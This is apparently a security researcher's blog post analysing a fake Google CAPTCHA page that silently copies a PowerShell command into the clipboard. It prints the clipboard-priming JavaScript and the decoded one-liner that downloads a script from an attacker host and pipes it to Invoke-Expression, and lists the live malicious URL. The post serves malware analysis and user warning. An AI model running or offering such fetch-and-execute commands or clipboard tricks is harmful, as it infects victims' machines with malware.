Fake CAPTCHA Websites: Clipboard Hijacking and Malware Delivery

Posted on

Background

Fake CAPTCHA pages are a growing phishing and malware delivery technique. Attackers spin up webpages that mimic familiar CAPTCHA checks (Google reCAPTCHA, Cloudflare Turnstile, etc.) to convince users they must “verify” they are human. Instead of providing an actual challenge, these pages may:

  • Display a fake verification prompt.
  • Trick users into copying and running a malicious command.
  • Silently redirect to phishing logins or malware downloads.

Many such pages are hosted on legitimate cloud platforms (e.g., Cloudflare R2). The trusted hosting and easy deployment make them attractive to attackers. After a victim follows instructions, the delivered code often fetches additional payloads (stealers, RATs, etc.) and compromises the system.

Discovery Details

  • Date & Time (UTC): 6 September 2025, 03:25
  • Discovery Method: The suspicious page appeared after navigating through external links on a streaming site. It presented a Google-like CAPTCHA verification request, which raised suspicion and led to further analysis.
  • Source Website (where encountered): hxxps://www[.]fushaar[.]com/ (searching for “The Imitation Game”)
  • Malicious URL (defanged): hxxps://pub-21433263b3ab4c129afeecdecfd2e39c[.]r2[.]dev/HGDJ72nJJksd623N-G00gle-C%40ptcha-05-4.html
  • Live sample (do not visit): shown below as plain text for research hygiene:
    https://pub-21433263b3ab4c129afeecdecfd2e39c.r2.dev/HGDJ72nJJksd623N-G00gle-C%40ptcha-05-4.html
  • Wayback Machine: in case not found:
    https://web.archive.org/web/20250905184801/https://pub-21433263b3ab4c129afeecdecfd2e39c.r2.dev/HGDJ72nJJksd623N-G00gle-C%40ptcha-05-4.html

Technical Analysis

Fake CAPTCHA verification prompt
Screenshot: Fake CAPTCHA page prompting a verification action.

Clipboard Hijacking

Without any manual copy action, the page preloaded a command into the clipboard. The relevant function observed in the source was:

1
 
function copyToClipboard() {
  navigator.clipboard.writeText(
    "powershell -w mini [Uri]::UnescapeDataString('%77%67%65%74...')|powershell"
  );
}

This ensures that when users follow the on-page instructions (for example: Win+RCtrl+VEnter), a preloaded PowerShell command runs and retrieves a remote script—allowing the attacker to deliver malware without any explicit copy action by the victim.

Malware Payload

There are two payloads to analyze: (1) the behavior visible in the page’s inline JavaScript when inspected in the browser, and (2) the code embedded in the raw page source. Reviewing both helps establish capabilities and the execution chain.

Quick decode: Using a URL decoder (for example, urldecoder.org) on the percent-encoded string reveals a PowerShell one‑liner that downloads and executes a remote script in memory. The decoded command resolves to the Invoke‑WebRequest alias with basic parsing, piped to Invoke‑Expression, e.g.:

wget -UseBasicParsing hxxps://diravo[.]com/dls.txt | i`ex

Meaning: fetch a script from the defanged URL and execute it. Do not run this.

Browser Inspect view showing inline JavaScript on the fake CAPTCHA page
Inspect (DevTools): inline JavaScript related to clipboard priming.
Page Source view highlighting the malicious script in the HTML
Page Source (Ctrl+U): embedded script revealing the payload path.

Note: At the time of writing, ANY.RUN did not flag this sample as malicious. Detections can change over time.

Safety: Never execute commands from untrusted web pages. If prompted to paste/run a command, close the page and investigate.

Next: In a follow-up, I’ll reveal the embedded code, show the deobfuscation steps, and map the full payload chain with IoCs.

References